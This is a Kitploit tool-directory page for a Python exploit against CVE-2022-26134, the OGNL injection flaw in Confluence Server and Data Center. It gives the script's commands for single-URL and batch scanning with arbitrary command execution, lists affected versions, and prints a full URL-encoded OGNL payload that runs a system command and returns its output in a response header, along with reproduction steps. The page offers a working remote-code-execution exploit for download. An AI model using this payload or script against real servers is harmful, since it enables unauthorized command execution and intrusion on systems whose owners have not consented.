Skip to content
KitploitKITPLOIT
ToolsExploitsBlog
Log in
Submit
ToolsExploitsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

FeedsContactPrivacy© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2022-26134 — Python-based exploit for CVE-2022-26134, an OGNL injection vulnerability in Confluence Server and Data Center. Supports single URL check and batch scanning with arbitrary command execution. | Kitploit
Tools/GitHubGitHub/ytxzx/cve-2022-26134
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingCommand and Control
GitHubytxzx/cve-2022-26134

CVE-2022-26134

Python-based exploit for CVE-2022-26134, an OGNL injection vulnerability in Confluence Server and Data Center. Supports single URL check and batch scanning with arbitrary command execution.

View Repository
72 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2022-26134 - Confluence OGNL injection vulnerability

Script Usage

Install Python libraries

pip install -r requirements.txt

Vulnerability Verification

python3 CVE-2022-26134_check.py -u url -c whoami

image

Batch Scanning

python3 CVE-2022-26134_check.py -f url.txt -c whoami

image

Affected Versions

Confluence Server and Data Center >= 1.3.0

Confluence Server and Data Center < 7.4.17

Confluence Server and Data Center < 7.13.7

Confluence Server and Data Center < 7.14.3

Confluence Server and Data Center < 7.15.2

Confluence Server and Data Center < 7.16.4

Confluence Server and Data Center < 7.17.4

Confluence Server and Data Center < 7.18.1

Vulnerability Reproduction

Payload:

/%24%7B%28%23a%3D%40org.apache.commons.io.IOUtils%40toString%28%40java.lang.Runtime%40getRuntime%28%29.exec%28%22whoami%22%29.getInputStream%28%29%2C%22utf-8%22%29%29.%28%40com.opensymphony.webwork.ServletActionContext%40getResponse%28%29.setHeader%28%22X-Qualys-Response%22%2C%23a%29%29%7D/

Access the Confluence service, capture a packet with response code 302, send a packet with the payload, and the X-Qualys-Response parameter in the response packet will return the current server username.

image

Vulnerability Principle

The URI provided by the attacker will be converted into a namespace, and then that namespace will be converted into an OGNL expression for evaluation (the attacker's URL is indirectly converted into an OGNL expression for evaluation).

Download Tool